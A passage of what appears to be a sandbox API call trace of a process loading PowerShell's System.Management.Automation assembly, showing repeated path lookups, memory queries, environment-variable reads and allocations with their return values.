() returned 0xcb [0147.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.060] GetLastError () returned 0xcb [0147.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.060] GetLastError () returned 0xcb [0147.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d634, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.060] GetLastError () returned 0xcb [0147.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.060] GetLastError () returned 0xcb [0147.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.060] GetLastError () returned 0xcb [0147.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d634, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.060] GetLastError () returned 0xcb [0147.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.060] GetLastError () returned 0xcb [0147.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.060] GetLastError () returned 0xcb [0147.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d634, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.061] GetLastError () returned 0xcb [0147.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.061] GetLastError () returned 0xcb [0147.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.061] GetLastError () returned 0xcb [0147.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.061] GetLastError () returned 0xcb [0147.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.061] GetLastError () returned 0xcb [0147.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.061] GetLastError () returned 0xcb [0147.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.061] GetLastError () returned 0xcb [0147.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.061] GetLastError () returned 0xcb [0147.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.061] GetLastError () returned 0xcb [0147.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.061] GetLastError () returned 0xcb [0147.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.061] GetLastError () returned 0xcb [0147.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.061] GetLastError () returned 0xcb [0147.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.062] GetLastError () returned 0xcb [0147.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.062] GetLastError () returned 0xcb [0147.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.062] GetLastError () returned 0xcb [0147.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.062] GetLastError () returned 0xcb [0147.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.062] GetLastError () returned 0xcb [0147.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.062] GetLastError () returned 0xcb [0147.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.062] GetLastError () returned 0xcb [0147.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.062] GetLastError () returned 0xcb [0147.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.062] GetLastError () returned 0xcb [0147.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.063] GetLastError () returned 0xcb [0147.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.063] GetLastError () returned 0xcb [0147.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.063] GetLastError () returned 0xcb [0147.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.063] GetLastError () returned 0xcb [0147.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.063] GetLastError () returned 0xcb [0147.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.063] GetLastError () returned 0xcb [0147.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.063] GetLastError () returned 0xcb [0147.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.063] GetLastError () returned 0xcb [0147.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.063] GetLastError () returned 0xcb [0147.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d614, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.064] GetLastError () returned 0xcb [0147.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.064] GetLastError () returned 0xcb [0147.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.064] GetLastError () returned 0xcb [0147.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.064] GetLastError () returned 0xcb [0147.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d614, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.079] GetLastError () returned 0xcb [0147.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.079] GetLastError () returned 0xcb [0147.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.079] GetLastError () returned 0xcb [0147.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d614, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.079] GetLastError () returned 0xcb [0147.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.079] GetLastError () returned 0xcb [0147.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.079] GetLastError () returned 0xcb [0147.079] VirtualQuery (in: lpAddress=0x24cb40, lpBuffer=0x24db40, dwLength=0x1c | out: lpBuffer=0x24db40*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0147.080] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0147.080] GetLastError () returned 0xcb [0147.189] VirtualQuery (in: lpAddress=0x24cb40, lpBuffer=0x24db40, dwLength=0x1c | out: lpBuffer=0x24db40*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0147.206] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0147.206] GetLastError () returned 0xcb [0147.210] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0147.210] GetLastError () returned 0xcb [0147.212] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0147.212] GetLastError () returned 0xcb [0147.218] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0147.218] GetLastError () returned 0xcb [0147.221] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0147.221] GetLastError () returned 0xcb [0147.237] VirtualQuery (in: lpAddress=0x24cb40, lpBuffer=0x24db40, dwLength=0x1c | out: lpBuffer=0x24db40*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0147.238] VirtualQuery (in: lpAddress=0x24cb40, lpBuffer=0x24db40, dwLength=0x1c | out: lpBuffer=0x24db40*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0147.477] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0147.477] GetLastError () returned 0xcb [0147.566] VirtualQuery (in: lpAddress=0x24cb40, lpBuffer=0x24db40, dwLength=0x1c | out: lpBuffer=0x24db40*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0147.728] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0147.728] GetLastError () returned 0xcb [0148.530] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x35e600 [0148.530] GetLastError () returned 0x0 [0148.531] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x35e688 [0148.531] GetLastError () returned 0x0 [0148.824] VirtualQuery (in: lpAddress=0x24cb40, lpBuffer=0x24db40, dwLength=0x1c | out: lpBuffer=0x24db40*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0148.848] VirtualQuery (in: lpAddress=0x24cb40, lpBuffer=0x24db40, dwLength=0x1c | out: lpBuffer=0x24db40*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0148.850] VirtualQuery (in: lpAddress=0x24cb40, lpBuffer=0x24db40, dwLength=0x1c | out: lpBuffer=0x24db40*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0148.851] VirtualQuery (in: lpAddress=0x24c1f4, lpBuffer=0x24d1f4, dwLength=0x1c | out: lpBuffer=0x24d1f4*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.086] VirtualQuery (in: lpAddress=0x24cb40, lpBuffer=0x24db40, dwLength=0x1c | out: lpBuffer=0x24db40*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.087] VirtualQuery (in: lpAddress=0x24cb40, lpBuffer=0x24db40, dwLength=0x1c | out: lpBuffer=0x24db40*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.087] VirtualQuery (in: lpAddress=0x24cb40, lpBuffer=0x24db40, dwLength=0x1c | out: lpBuffer=0x24db40*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.087] VirtualQuery (in: lpAddress=0x24cb40, lpBuffer=0x24db40, dwLength=0x1c | out: lpBuffer=0x24db40*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.087] VirtualQuery (in: lpAddress=0x24cb40, lpBuffer=0x24db40, dwLength=0x1c | out: lpBuffer=0x24db40*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.087] VirtualQuery (in: lpAddress=0x24cb40, lpBuffer=0x24db40, dwLength=0x1c | out: lpBuffer=0x24db40*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.087] VirtualQuery (in: lpAddress=0x24cb40, lpBuffer=0x24db40, dwLength=0x1c | out: lpBuffer=0x24db40*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.087] VirtualQuery (in: lpAddress=0x24cb40, lpBuffer=0x24db40, dwLength=0x1c | out: lpBuffer=0x24db40*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.087] VirtualQuery (in: lpAddress=0x24cb40, lpBuffer=0x24db40, dwLength=0x1c | out: lpBuffer=0x24db40*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c 